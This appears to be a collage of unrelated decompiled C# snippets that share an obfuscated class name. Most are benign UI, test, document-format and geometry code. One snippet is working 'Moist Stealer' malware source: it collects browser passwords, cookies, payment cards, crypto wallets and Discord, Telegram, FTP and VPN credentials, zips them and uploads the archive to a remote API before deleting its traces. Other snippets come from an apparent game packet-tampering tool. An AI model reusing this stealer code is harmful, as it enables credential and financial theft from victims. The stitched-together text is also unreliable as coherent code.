// Token: 0x0600001F RID: 31 RVA: 0x0000245A File Offset: 0x0000065A public Form1() { Class14.ybVLygozAZwCZ(); base..ctor(); base.Load += this.Form1_Load; this.InitializeComponent(); }
private static void smethod_9(BinaryWriter A_0, Class14 A_1) { if ((!A_1.method_124().IsEmpty || (A_1.method_126() != 0)) || (A_1.method_122() != FramesetBorderType.Simple)) { int position = (int)A_0.BaseStream.Position; smethod_4(A_0, 0); smethod_4(A_0, 5); smethod_4(A_0, smethod_11(A_1.method_126(), 0, 0x7bc0) ? A_1.method_126() : 0); smethod_4(A_0, Class624.smethod_6(A_1.method_124())); switch (A_1.method_122()) { case FramesetBorderType.None: smethod_4(A_0, 1); break; case FramesetBorderType.Raised: smethod_4(A_0, 2); break; default: smethod_4(A_0, 0); break; } smethod_5(A_0, (long)position); } }
public static void smethod_0(byte[] byte_0) { bool flag = false; Class13 @class = new Class13(byte_0); Class28.smethod_2(@class.Int32_1, byte_0); Class1.class11_0.method_6(byte_0); if (Class17.bool_0) { switch (Class17.short_0) { case 0: Class1.string_3 = @class.method_0(); Class28.smethod_4("Working for " + Class1.string_3); break; case 1: { Class17.int_1 = @class.Int32_1; Class14 class2 = new Class14(Class17.int_1); class2.method_3(Class24.class23_3.method_4().ToLower()); Class1.class19_0.method_8(class2.method_5()); Class28.smethod_3("Pwned Server Security! Sent custom keys! 8-)"); Class17.bool_0 = false; flag = true; break; } } Class17.short_0 += 1; } if (!flag) { byte[] byte_ = @class.method_3(); Class1.class19_0.method_8(byte_); } }
public static PdfFont AddFont(PdfBody body, string pdfFontID, WW.Pdf.Font.Font font) { PdfFont pdfFont; if (font is Class14) { Class14 base14 = (Class14)font; pdfFont = (PdfFont)PdfFontCreator.smethod_1(pdfFontID, base14); } else { IFontMetric fontMetric = PdfFontCreator.smethod_3(font); if (fontMetric is Class14) { Class14 base14 = (Class14)fontMetric; pdfFont = (PdfFont)PdfFontCreator.smethod_1(pdfFontID, base14); } else if (fontMetric is ns7.Class33) { ns7.Class33 ttf = (ns7.Class33)fontMetric; pdfFont = (PdfFont)PdfFontCreator.smethod_2(body, pdfFontID, font, ttf); } else { ns0.Class30 cidFont = (ns0.Class30)fontMetric; pdfFont = PdfFontCreator.smethod_0(body, pdfFontID, font, cidFont); } } if (pdfFont == null) { throw new Exception("Unable to create Pdf font object for " + pdfFontID); } body.Fonts.Add(pdfFont); return(pdfFont); }
internal static bool smethod_1(Region region_0, string string_1) { Class14 class2 = new Class14 { string_0 = string_1 }; string_0 = ""; Class40.smethod_0(region_0); if (!bool_0) { Class40.Event_1 += (Class13.< > 9__6_0 ?? (Class13.< > 9__6_0 = new EventHandler(Class13.< > 9.method_1))); bool_0 = true; } if (!bool_1) { Class40.Event_2 += (Class13.< > 9__6_1 ?? (Class13.< > 9__6_1 = new EventHandler(Class13.< > 9.method_2))); bool_1 = true; } bool?nullable = new bool?(Class45.smethod_2 <bool>(new Func <Class40, bool>(class2.method_0))); if (!nullable.HasValue) { return(false); } return(nullable.Value); }
// Token: 0x060001F4 RID: 500 RVA: 0x00012594 File Offset: 0x00010794 public static async void smethod_0(object object_0, JSExtInvokeArgs jsextInvokeArgs_0) { if (Renewal.form_0 == null) { Dictionary <string, string> dictionary = new Dictionary <string, string>(); dictionary["hosted_button_id"] = "Z8ZSS4MJ7XD72"; dictionary["cmd"] = "_s-xclick"; dictionary["on0"] = "License Key"; dictionary["os0"] = Licenser.class156_0.Key; TaskAwaiter <HttpResponseMessage> taskAwaiter = new Class14(null, "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.99 Safari/537.36", 10, false, true, null).method_3("https://www.paypal.com/cgi-bin/webscr", dictionary, false).GetAwaiter(); if (!taskAwaiter.IsCompleted) { await taskAwaiter; TaskAwaiter <HttpResponseMessage> taskAwaiter2; taskAwaiter = taskAwaiter2; taskAwaiter2 = default(TaskAwaiter <HttpResponseMessage>); } Renewal.form_0 = new Renewal(taskAwaiter.GetResult().Headers.Location.ToString()); Renewal.form_0.Show(); MainWindow.webView_0.QueueScriptCall("swal('PayPal Opened', 'A PayPal browser has appeared, please complete the payment.', 'success', {timer: 3000})"); } else { Renewal.form_0.WindowState = FormWindowState.Normal; Renewal.form_0.BringToFront(); } }
public static void Test_Method11() { var originalClass = typeof(Class14); Assert.NotNull(originalClass); var patchClass = typeof(Class14Patch); Assert.NotNull(patchClass); var harmonyInstance = new Harmony("test"); Assert.NotNull(harmonyInstance); var processor = harmonyInstance.CreateClassProcessor(patchClass); Assert.NotNull(processor); Assert.NotNull(processor.Patch()); _ = new Class14().Test("Test1", new KeyValuePair <string, int>("1", 1)); _ = new Class14().Test("Test2", new KeyValuePair <string, int>("1", 1), new KeyValuePair <string, int>("2", 2)); Assert.AreEqual("Prefix0", Class14.state[0]); Assert.AreEqual("Test1", Class14.state[1]); Assert.AreEqual("Postfix0", Class14.state[2]); Assert.AreEqual("Prefix1", Class14.state[3]); Assert.AreEqual("Test2", Class14.state[4]); Assert.AreEqual("Postfix1", Class14.state[5]); }
private void btnDel_Click(object sender, EventArgs e) { int num = 0; int count = this.lstSelected.SelectedIndices.Count; int num2 = this.lstSelected.SelectedIndices[count - 1]; this.lstUnselected.SelectedItems.Clear(); while (this.lstSelected.SelectedItems.Count > 0) { Class14 @class = (Class14)this.lstSelected.SelectedItems[0]; num = this.method_2(@class); @class.method_1(-1); this.lstUnselected.Items.Insert(num, @class); this.lstUnselected.SetSelected(num, true); this.lstSelected.Items.RemoveAt(this.lstSelected.SelectedIndices[0]); } int num3 = num2 - count + 1; if (num3 >= this.lstSelected.Items.Count) { num3 = this.lstSelected.Items.Count - 1; } this.lstSelected.SelectedIndex = num3; this.method_3(); this.method_4(); }
private void btnAdd_Click(object sender, EventArgs e) { int num = 0; int count = this.lstUnselected.SelectedIndices.Count; int num2 = this.lstUnselected.SelectedIndices[count - 1]; int num3 = 0; this.lstSelected.SelectedItems.Clear(); while (this.lstUnselected.SelectedItems.Count > 0 && this.lstSelected.Items.Count < 15) { num = this.lstSelected.Items.Count; Class14 @class = (Class14)this.lstUnselected.SelectedItems[0]; @class.method_1(num); num3 = this.lstSelected.Items.Add(@class); this.lstSelected.SetSelected(num3, true); this.lstUnselected.Items.RemoveAt(this.lstUnselected.SelectedIndices[0]); } if (this.lstUnselected.SelectedItems.Count == 0) { int num4 = num2 - count + 1; if (num4 >= this.lstUnselected.Items.Count) { num4 = this.lstUnselected.Items.Count - 1; } this.lstUnselected.SelectedIndex = num4; } this.method_3(); this.method_4(); if (!this.btnAdd.Enabled) { this.lstSelected.Focus(); } }
private static void smethod_3(BinaryWriter A_0, Class14 A_1, bool A_2) { if (A_2) { smethod_6(A_0); } smethod_8(A_0, A_1); smethod_7(A_0, Dofrt.DofrtFsnName, A_1.method_51()); smethod_7(A_0, Dofrt.DofrtFsnFnm, A_1.method_53()); if (A_2) { smethod_9(A_0, A_1); } if (A_1.method_120()) { smethod_10(A_0, true); using (IEnumerator enumerator = A_1.method_121().System.Collections.IEnumerable.GetEnumerator()) { while (enumerator.MoveNext()) { Class14 current = (Class14)enumerator.Current; smethod_3(A_0, current, false); } } smethod_10(A_0, false); } }
public void Test1() { int[] expected = new int[] { 2, 6 }; string input = "whatwhywhere"; var actual = Class14.SlidingSubArrayString(input); Assert.Equal(expected, actual); }
public void Test4() { int[] expected = new int[] { 0, 1 }; string input = "ab"; var actual = Class14.SlidingSubArrayString(input); Assert.Equal(expected, actual); }
private void button2_Click(object sender, EventArgs e) { if (this.comboBox2.Text == "" || this.comboBox1.Text == "" || this.textBox1.Text == "") { MessageBox.Show("Fill all data", "Information", MessageBoxButtons.OK, MessageBoxIcon.Hand); } else { Class14 @class = new Class14(Convert.ToInt32(this.textBox1.Text)); string text = ""; string a = "get"; for (int i = 0; i < this.int_0 * 2; i++) { if (a == "get") { text = this.panel1.Controls[i].Text; a = "set"; } else { string text2 = text; if (text2 != null) { if (!(text2 == "String")) { if (!(text2 == "Int")) { if (text2 == "Bool") { @class.method_2(this.panel1.Controls[i].Text == "true"); } } else { @class.method_1(Convert.ToInt32(this.panel1.Controls[i].Text)); } } else { @class.method_3(this.panel1.Controls[i].Text); } } a = "get"; } } if (this.comboBox2.Text.Contains("Server")) { Class1.class19_0.method_8(@class.method_5()); } else { Class1.class19_0.method_7(@class.method_5()); } } }
public void test() { MDependency14.AllInstances.generateClass14 = (Dependency14 dependency, Class14 clazz) => { clazz.callback(123); }; Class14 clazz2 = new Class14(); Assert.AreEqual(2 * 123, clazz2.generate()); }
private void lstSelected_DoubleClick(object sender, EventArgs e) { if (this.lstSelected.SelectedItem != null) { Class14 @class = this.lstSelected.SelectedItem as Class14; MainForm mainForm = base.MdiParent as MainForm; if (mainForm != null) { mainForm.DispChildForm(typeof(ContactForm), @class.Value - 1); } } }
private List <Class14> method_14(ref List <Constraint> list_6) { List <Class14> list = new List <Class14>(); List <Constraint> list2 = new List <Constraint>(); for (int i = 0; i < list_6.Count; i++) { try { bool flag = true; List <DelaunayTriangulation2d.Class15> list3 = base.method_9(list_6[i].Edge.StartPoint); if (list3.Count == 0) { throw new System.Exception("The start point of a constraint / boundary edge is not part of the triangulation"); } if (list3.Count < 3) { throw new System.Exception("Incident node retrieval failed."); } for (int j = 0; j < list3.Count; j++) { if (list3[j].method_12().method_18(list_6[i].Edge.EndPoint)) { flag = false; } } if (flag) { bool flag2 = false; Class14 @class = new Class14(); @class.point_0 = this.method_15(list_6[i], list3, ref flag2); @class.constraint_0 = new Constraint(new Edge(list_6[i].Edge.StartPoint, @class.point_0), list_6[i].Type); @class.constraint_1 = new Constraint(new Edge(@class.point_0, list_6[i].Edge.EndPoint), list_6[i].Type); if (!flag2) { list.Add(@class); } list2.Add(@class.constraint_0); list2.Add(@class.constraint_1); } else { list2.Add(list_6[i]); } } catch (System.Exception ex) { this.badConstraints.Add(list_6[i]); } } list_6 = list2; return(list); }
public static void smethod_1(byte[] byte_0) { bool flag = false; Class13 @class = new Class13(byte_0); Class28.smethod_0(@class.Int32_1, byte_0); Class1.class11_0.method_5(byte_0); if (Class17.bool_1) { switch (Class17.short_1) { case 0: { Class17.int_0 = @class.Int32_1; string string_ = @class.method_0(); Class24.smethod_1(string_); Class14 class2 = new Class14(Class17.int_0); class2.method_3(Class24.string_1); class2.method_2(false); flag = true; Class1.class19_0.method_7(class2.method_5()); Class28.smethod_4("Wait for banner exploit sulake 8-)"); break; } case 1: { Class17.int_2 = @class.Int32_1; Class24.smethod_2(@class.method_0()); Class14 class3 = new Class14(Class17.int_2); class3.method_3("1"); Class1.class19_0.method_7(class3.method_5()); Class24.class25_1 = new Class25(); Class24.class25_1.method_0(new byte[] { 1 }); while (!Class24.class25_1.bool_0) { } Class17.bool_1 = false; flag = true; Class28.smethod_4("Pwned Client Security! Sent pwned data to client 8-)"); break; } } Class17.short_1 += 1; } if (!flag) { byte[] byte_ = @class.method_3(); Class1.class19_0.method_7(byte_); } }
// Token: 0x060001F9 RID: 505 RVA: 0x0001274C File Offset: 0x0001094C void IAsyncStateMachine.MoveNext() { int num2; int num = num2; try { TaskAwaiter <HttpResponseMessage> taskAwaiter3; if (num != 0) { if (Renewal.form_0 != null) { Renewal.form_0.WindowState = FormWindowState.Normal; Renewal.form_0.BringToFront(); goto IL_11D; } Dictionary <string, string> dictionary = new Dictionary <string, string>(); dictionary["hosted_button_id"] = "Z8ZSS4MJ7XD72"; dictionary["cmd"] = "_s-xclick"; dictionary["on0"] = "License Key"; dictionary["os0"] = Licenser.class156_0.Key; taskAwaiter3 = new Class14(null, "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.99 Safari/537.36", 10, false, true, null).method_3("https://www.paypal.com/cgi-bin/webscr", dictionary, false).GetAwaiter(); if (!taskAwaiter3.IsCompleted) { num2 = 0; taskAwaiter2 = taskAwaiter3; this.asyncVoidMethodBuilder_0.AwaitUnsafeOnCompleted <TaskAwaiter <HttpResponseMessage>, Renewal.Struct37>(ref taskAwaiter3, ref this); return; } } else { taskAwaiter3 = taskAwaiter2; taskAwaiter2 = default(TaskAwaiter <HttpResponseMessage>); num2 = -1; } Renewal.form_0 = new Renewal(taskAwaiter3.GetResult().Headers.Location.ToString()); Renewal.form_0.Show(); MainWindow.webView_0.QueueScriptCall("swal('PayPal Opened', 'A PayPal browser has appeared, please complete the payment.', 'success', {timer: 3000})"); IL_11D :; } catch (Exception exception) { num2 = -2; this.asyncVoidMethodBuilder_0.SetException(exception); return; } num2 = -2; this.asyncVoidMethodBuilder_0.SetResult(); }
private static void smethod_2(Class398 A_0, Class14 A_1) { int num = 1; A_0.method_4(BookmarkStart.b("倦ጨ䴪弬丮尰嘲䘴制䴸栺䴼匾⡀㝂❄♆㭈", 1)); A_0.method_32(BookmarkStart.b("倦ጨ尪", 1), A_1.method_126(), 0); A_0.method_27(BookmarkStart.b("倦ጨ䠪䈬䌮帰䄲", 1), A_1.method_124()); string str = Class417.smethod_1(A_1.method_122()); if (Class567.smethod_16(str)) { A_0.vmethod_0(string.Format(BookmarkStart.b("倦ጨ倪ᴬ刮", num), str), true); } A_0.method_5(); }
// Token: 0x06000096 RID: 150 RVA: 0x00009944 File Offset: 0x00007B44 public Class14(string string_0 = null, string string_1 = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.99 Safari/537.36", int int_0 = 10, bool bool_1 = false, bool bool_2 = false, JObject jobject_0 = null) { this.bool_0 = bool_1; this.cookieContainer_0 = new CookieContainer(); WebRequestHandler webRequestHandler = new WebRequestHandler { UseCookies = true, CookieContainer = this.cookieContainer_0, AllowAutoRedirect = false, Proxy = Class14.smethod_0(string_0), PreAuthenticate = true, AutomaticDecompression = (DecompressionMethods.GZip | DecompressionMethods.Deflate), ClientCertificateOptions = ClientCertificateOption.Manual }; if (!bool_2) { webRequestHandler.ServerCertificateValidationCallback = new RemoteCertificateValidationCallback(this.method_0); } Class174 innerHandler = new Class174 { InnerHandler = webRequestHandler }; ClearanceHandler handler = new ClearanceHandler { InnerHandler = innerHandler, MaxRetries = 3 }; this.httpClient_0 = new HttpClient(handler) { Timeout = TimeSpan.FromSeconds((double)int_0) }; this.httpClient_0.DefaultRequestHeaders.TryAddWithoutValidation("User-Agent", string_1); this.httpClient_0.DefaultRequestHeaders.TryAddWithoutValidation("Accept-Encoding", "gzip, deflate"); this.httpClient_0.DefaultRequestHeaders.TryAddWithoutValidation("Upgrade-Insecure-Requests", "1"); this.httpClient_0.DefaultRequestHeaders.TryAddWithoutValidation("Accept-Language", "en-GB,en-US;q=0.9,en;q=0.8"); this.httpClient_0.DefaultRequestHeaders.TryAddWithoutValidation("Connection", "keep-alive"); if (jobject_0 != null) { foreach (KeyValuePair <string, JToken> keyValuePair in jobject_0) { this.httpClient_0.DefaultRequestHeaders.TryAddWithoutValidation(keyValuePair.Key, (string)keyValuePair.Value); } } }
// Token: 0x0600017D RID: 381 RVA: 0x0001027C File Offset: 0x0000E47C public static async Task smethod_0(GClass4 gclass4_0, string string_0, JObject jobject_0) { int num = 0; while ((int)DateTime.Now.Subtract(gclass4_0.dateTime_0).TotalMilliseconds < Class130.int_0 + 1000) { JToken jtoken = (Class130.jarray_0.Count > 0) ? Class130.jarray_0[num] : null; try { using (Class14 @class = new Class14((string)((jtoken != null) ? jtoken["proxy"] : null), "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.99 Safari/537.36", 10, true, false, jobject_0)) { gclass4_0.task_1 = @class.method_2(string_0, true); await gclass4_0.task_1; } Class14 @class = null; goto IL_19D; } catch { goto IL_19D; } goto IL_11D; IL_124: TaskAwaiter taskAwaiter = Task.Delay(Class130.int_0).GetAwaiter(); if (!taskAwaiter.IsCompleted) { await taskAwaiter; TaskAwaiter taskAwaiter2; taskAwaiter = taskAwaiter2; taskAwaiter2 = default(TaskAwaiter); } taskAwaiter.GetResult(); continue; IL_11D: num = 0; goto IL_124; IL_19D: num++; if (num >= Class130.jarray_0.Count) { goto IL_11D; } goto IL_124; } }
private static void smethod_3(Class398 A_0, Class14 A_1) { int num = 0; string str = ""; if (A_1.method_55() == FrameDividerPositionType.Percentage) { str = BookmarkStart.b("̥", num); } else if (A_1.method_55() == FrameDividerPositionType.Relative) { str = BookmarkStart.b("థ", num); } str = string.Format(BookmarkStart.b("崥ᠧ圩圫Ἥ䴯", num), A_1.method_57(), str); if (str != BookmarkStart.b("ᜥȧ", num)) { A_0.method_24(BookmarkStart.b("儥ሧ天嘫", num), str); } }
protected void method_29(object A_0) { Class14 class2 = (Class14)A_0; if (class2.HasKey(6)) { int num = class2.method_92(); if (class2.method_95() == FrameSizeRule.AtLeast) { num |= 0x8000; } this.class345_0.method_1(SprmCode.PWHeightAbs, num); } if (class2.HasKey(14)) { this.method_16(SprmCode.PFrameTextFlow, class2.method_32(14)); } if (class2.HasKey(0x10)) { this.method_16(SprmCode.PDyaFromText, class2.method_32(0x10)); } if (class2.HasKey(9)) { this.method_16(SprmCode.PDxaFromText, class2.method_32(9)); } if (class2.HasKey(5)) { this.method_4(SprmCode.PFLockAnchor, class2.method_32(5)); } if (class2.HasKey(13)) { this.method_4(SprmCode.PFNoAllowOverlap, class2.method_32(13)); } if (class2.HasKey(20)) { DropCapPosition position = class2.method_108(); int num2 = class2.method_110(); int num3 = ((int)position) | (num2 << 3); this.class345_0.method_1(SprmCode.PDcs, num3); } }
public Image CaptureWindow(IntPtr handle) { IntPtr windowDC = Class14.GetWindowDC(handle); Class14.Struct16 struct2 = new Class14.Struct16(); Class14.GetWindowRect(handle, ref struct2); int num = struct2.int_2 - struct2.int_0; int num2 = struct2.int_3 - struct2.int_1; IntPtr ptr2 = Class13.CreateCompatibleDC(windowDC); IntPtr ptr3 = Class13.CreateCompatibleBitmap(windowDC, num, num2); IntPtr ptr4 = Class13.SelectObject(ptr2, ptr3); Class13.BitBlt(ptr2, 0, 0, num, num2, windowDC, 0, 0, 0xcc0020); Class13.SelectObject(ptr2, ptr4); Class13.DeleteDC(ptr2); Class14.ReleaseDC(handle, windowDC); Image image = Image.FromHbitmap(ptr3); Class13.DeleteObject(ptr3); return(image); }
private static void smethod_8(BinaryWriter A_0, Class14 A_1) { long position = A_0.BaseStream.Position; smethod_4(A_0, 0); smethod_4(A_0, 1); smethod_4(A_0, (int)A_1.method_55()); smethod_4(A_0, A_1.method_57()); smethod_4(A_0, (int)A_1.method_59()); smethod_4(A_0, A_1.method_120() ? 1 : 2); smethod_4(A_0, A_1.method_61()); smethod_4(A_0, A_1.method_66()); smethod_4(A_0, (int)A_1.method_114()); int num2 = 0; num2 = 0 | (A_1.method_116() ? 1 : 0); num2 |= A_1.method_118() ? 2 : 0; smethod_4(A_0, num2); smethod_4(A_0, 6); smethod_5(A_0, position); }
private int method_2(Class14 class14_0) { int num = 0; num = 0; while (true) { if (num < this.lstUnselected.Items.Count) { Class14 @class = (Class14)this.lstUnselected.Items[num]; if (class14_0.Value < @class.Value) { break; } num++; continue; } return(num); } return(num); }
private void method_3() { int num = 0; bool flag = false; this.lstSelected.BeginUpdate(); for (num = 0; num < this.lstSelected.Items.Count; num++) { Class14 @class = (Class14)this.lstSelected.Items[num]; if (@class.method_0() != num) { @class.method_1(num); flag = this.lstSelected.GetSelected(num); this.lstSelected.Items[num] = @class; if (flag) { this.lstSelected.SetSelected(num, true); } } } this.lstSelected.EndUpdate(); }
private static void smethod_1(Class398 A_0, Class14 A_1, bool A_2, bool A_3) { int num = 2; A_0.method_4(A_1.method_120() ? BookmarkStart.b("弧ဩ䨫尭儯弱儳䔵崷丹", num) : BookmarkStart.b("弧ဩ䨫尭儯弱儳", num)); if (A_3) { smethod_2(A_0, A_1); } else { smethod_3(A_0, A_1); } if (!A_1.method_120()) { A_0.method_30(BookmarkStart.b("弧ဩ愫伭䈯稱", num), A_1.method_61()); A_0.method_30(BookmarkStart.b("弧ဩ愫伭䈯搱", num), A_1.method_66()); A_0.method_24(BookmarkStart.b("弧ဩ䈫伭崯圱", num), A_1.method_51()); if ((A_1.method_53() != null) && !A_2) { A_0.method_24(BookmarkStart.b("弧ဩ弫䄭䔯䀱圳匵縷匹倻嬽฿⍁⥃⍅", num), A_1.method_53()); } } A_0.method_31(BookmarkStart.b("弧ဩ䈫䄭戯圱䜳張䈷弹紻刽ⰿⵁ㍃⍅ⱇ", num), A_1.method_118()); A_0.method_31(BookmarkStart.b("弧ဩ䀫䜭帯失儳刵氷唹稻圽ⰿ❁", num), A_1.method_116()); A_0.method_24(BookmarkStart.b("弧ဩ堫䜭䐯帱儳", num), A_1.method_49()); using (IEnumerator enumerator = A_1.method_121().System.Collections.IEnumerable.GetEnumerator()) { while (enumerator.MoveNext()) { Class14 current = (Class14)enumerator.Current; smethod_1(A_0, current, A_2, false); } } A_0.method_5(); }
public static void GetStealer() { try { Directory.CreateDirectory(Help.Moist_Dir); Directory.CreateDirectory(Help.Browsers); Directory.CreateDirectory(Help.Passwords); Directory.CreateDirectory(Help.Autofills); Directory.CreateDirectory(Help.Downloads); Directory.CreateDirectory(Help.Cookies); Directory.CreateDirectory(Help.History); Directory.CreateDirectory(Help.Cards); File.SetAttributes(Help.dir, FileAttributes.Hidden | FileAttributes.System | FileAttributes.Directory); GetFiles.Inizialize(Help.Moist_Dir); Thread.Sleep(new Random(Environment.TickCount).Next(10000, 20000)); try { Class4.smethod_0(Help.Cookies); } catch { } try { Class4.PlqfdbrYf(Help.Passwords); } catch { } try { Class4.smethod_2(Help.Autofills); } catch { } try { Class4.smethod_3(Help.Downloads); } catch { } try { Class4.smethod_4(Help.History); } catch { } try { Class4.smethod_1(Help.Cards); } catch { } try { Class12.smethod_2(); } catch { } try { Class12.smethod_3(); } catch { } try { Class25.smethod_0(Help.Moist_Dir); } catch { } try { Class15.smethod_0(Help.Moist_Dir); } catch { } try { Class24.smethod_0(Help.Moist_Dir); } catch { } try { Class23.smethod_0(Help.Moist_Dir); } catch { } try { Class20.smethod_0(Help.Moist_Dir); } catch { } try { TGrabber.Start(Help.Moist_Dir); } catch { } try { Class14.smethod_0(Help.Moist_Dir); } catch { } try { Class21.smethod_0(Help.Moist_Dir); } catch { } try { Class13.smethod_0(Help.Moist_Dir); } catch { } try { Class22.smethod_0(Help.Moist_Dir); } catch { } try { Class16.smethod_0(Help.Moist_Dir); } catch { } try { Class17.smethod_0(Help.Moist_Dir); } catch { } try { Class37.smethod_0(Help.Moist_Dir); } catch { } try { DomainDetect.Start(Help.Browsers); } catch { } string text = string.Concat(new string[] { Help.dir, "\\", Help.HWID, Help.smethod_0(), ".zip" }); using (ZipFile zipFile = new ZipFile(Encoding.GetEncoding("cp866"))) { zipFile.CompressionLevel = 9; zipFile.Comment = string.Concat(new string[] { "Moist Stealer. Build 1.1\n<---------------------------------------->\nPC:", Environment.MachineName, "/", Environment.UserName, "\nIP: ", Help.IP, Help.Country(), "\nHWID: ", Help.HWID }); zipFile.AddDirectory(Help.Moist_Dir ?? ""); zipFile.Save(text ?? ""); } string text2 = text ?? ""; byte[] file = File.ReadAllBytes(text2); string url = string.Concat(new string[] { Help.ApiUrl, "?id=", Class1.string_0, "&caption=", "⚡️ Moist Stealer Gate detected new log! ⚡️\n", "\ud83d\udd25 User: "******"/", Environment.UserName, " \ud83d\udd25\n", "\ud83c\udf0d IP: " + Help.IP, " ", Help.Country(), "\n\n", string.Concat(new string[] { "\n\ud83c\udf10 Browsers Data\nPasswords: ", (Class4.int_0 + Class10.int_0 + Class12.EeFrnHmbxo).ToString(), "\nCookies: ", (Class4.int_3 + Class12.int_0).ToString(), "\nHistory: ", Class4.int_4.ToString(), "\nAutofill: ", Class4.int_1.ToString(), "\nCC: ", Class4.int_5.ToString(), "\n" }), string.Concat(new string[] { "\n\ud83d\udcb6 Wallets: ", (Class37.int_0 > 0) ? "Yes" : "No", (Class31.int_0 > 0) ? " Electrum" : "", (Class26.int_0 > 0) ? " Armory" : "", (Class27.int_0 > 0) ? " Atomic" : "", (Class28.int_0 > 0) ? " BitcoinCore" : "", (Class29.int_0 > 0) ? " Bytecoin" : "", (Class30.int_0 > 0) ? " DashCore" : "", (Class32.int_0 > 0) ? " Ethereum" : "", (Class33.int_0 > 0) ? " Exodus" : "", (Class35.int_0 > 0) ? " LitecoinCore" : "", (Class36.int_0 > 0) ? " Monero" : "", (Class38.int_0 > 0) ? " Zcash" : "", (Class34.int_0 > 0) ? " Jaxx" : "", "\n\n\ud83e\uddf2 Grabbed files: ", GetFiles.count.ToString(), "\n\ud83d\udcac Discord: ", (Class14.int_0 > 0) ? "Yes" : "No", "\n\ud83d\udee9 Telegram: ", (TGrabber.count > 0) ? "Yes" : "No", "\n\ud83d\udca1 Jabber: ", (Class20.int_0 + Class18.int_0 > 0) ? "Yes" : "No", (Class18.int_0 > 0) ? (" Pidgin (" + Class18.uGwrzbZsuw.ToString() + ")") : "", (Class20.int_0 > 0) ? " Psi" : "", "\n\n\ud83d\udce1 FTP\nFileZilla: ", (Class16.int_0 > 0) ? ("Yes (" + Class16.int_0.ToString() + ")") : "No", "\nTotalCmd: ", (Class17.int_0 > 0) ? "Yes" : "No", "\n\n⚖️ VPN\nNordVPN: ", (Class23.int_0 > 0) ? "Yes" : "No", "\nOpenVPN: ", (Class24.int_0 > 0) ? "Yes" : "No", "\nProtonVPN: ", (Class25.int_0 > 0) ? "Yes" : "No", "\n\nHWID: ", Help.HWID, "\n⚙️ ", Class22.smethod_4(), "\n\ud83d\udd0e Domain detect", File.ReadAllText(Help.Browsers + "\\DomainDetect.txt") }) }); SenderAPI.POST(file, text2, "application/x-ms-dos-executable", url); Directory.Delete(Help.dir + "\\", true); File.AppendAllText(Help.LocalData + "\\" + Help.HWID, Help.HWID); } catch { } }
private static void smethod_5() { foreach (Class29 current in Class28.dictionary_0.Values) { Thread.Sleep(600); Class14 @class = new Class14(311); @class.method_1(current.int_5); @class.method_1(-1); Class1.class19_0.method_8(@class.method_5()); } foreach (Class29 current in Class28.dictionary_0.Values) { Class28.stringBuilder_0.Append(string.Concat(new object[] { "INSERT INTO `latinemu`.`catalog_pages` (`id`, `parentid`, `minrank`, `caption`, `caption_code`, `color_id`, `icon_id`, `layout`, `headline1`, `teaser1`, `special`, `text1`, `text2`, `text3`) VALUES (", current.int_0, ", '", current.int_1, "', '1', '", current.string_0.Replace("'", "\\'"), "', '", current.string_1.Replace("'", "\\'"), "', '", current.int_2, "', '", current.int_3, "', '", current.string_2, "', '", current.string_3.Replace("'", "\\'"), "', '", current.string_4.Replace("'", "\\'"), "', '", current.string_5.Replace("'", "\\'"), "', '", current.string_6.Replace("'", "\\'"), "', '", current.string_7.Replace("'", "\\'"), "', '", current.string_8.Replace("'", "\\'"), "');" })); } foreach (Class30 current2 in Class28.dictionary_1.Values) { Class28.stringBuilder_0.Append(string.Concat(new object[] { "INSERT INTO `latinemu`.`catalog_items` (`id`, `pageId`, `furniId`, `amount`, `cost_credits`, `cost_point`, `caption`, `parentId`, `insideBox`) VALUES (", current2.int_0, ", '", current2.int_1, "', '", current2.int_4, "', '", current2.int_5, "', '", current2.int_2, "', '", current2.int_3, "', '", current2.string_0.Replace("'", "\\'"), "', '", current2.int_6, "', '", current2.bool_0 ? 1 : 0, "');" })); } StreamWriter streamWriter = new StreamWriter("catalog.sql"); streamWriter.WriteLine(Class28.stringBuilder_0.ToString()); streamWriter.Close(); Debug.WriteLine("Finished!"); }
public string method_44() { try { lock (Class15.object_0) { Class15.smethod_5(); Class15.Class17 @class = null; try { string str = Class15.Class16.string_0; string str2 = Class15.string_3 + "\\"; RegistryKey registryKey = Registry.CurrentUser; if (Class15.smethod_0()) { registryKey = Registry.LocalMachine; } RegistryKey registryKey2 = registryKey.OpenSubKey(str + str2, false); if (registryKey2 != null) { Class15.Class17 class2 = new Class15.Class17(); class2.method_0((string)registryKey2.GetValue("1"), Class15.byte_1, Class15.byte_2); if (@class == null) { @class = class2; } if (class2.ulong_0 > @class.ulong_0) { @class = class2; } } } catch { } try { if (Class14.smethod_5(base.GetType().Assembly).ToString().Length > 0 && File.Exists(Class14.smethod_5(base.GetType().Assembly).ToString())) { Class15.Class17 class3 = new Class15.Class17(); class3.method_0(Class15.smethod_8(Path.GetDirectoryName(Class14.smethod_5(base.GetType().Assembly).ToString()), Class15.string_2), Class15.byte_1, Class15.byte_2); if (@class == null) { @class = class3; } if (class3.ulong_0 > @class.ulong_0) { @class = class3; } } } catch { } try { if (File.Exists(Environment.GetFolderPath(Environment.SpecialFolder.CommonApplicationData) + Class15.Class16.string_2 + Class15.string_2)) { Class15.Class17 class4 = new Class15.Class17(); class4.method_0(Encoding.Unicode.GetString(Class15.smethod_11(Environment.GetFolderPath(Environment.SpecialFolder.CommonApplicationData) + Class15.Class16.string_2 + Class15.string_2)), Class15.byte_1, Class15.byte_2); if (@class == null) { @class = class4; } if (class4.ulong_0 > @class.ulong_0) { @class = class4; } } } catch { } if (@class == null) { @class = new Class15.Class17(); } return(@class.string_0); } } catch { } return(""); }
internal void method_2(Class14 A_0) { this.arrayList_0.Add(A_0); }
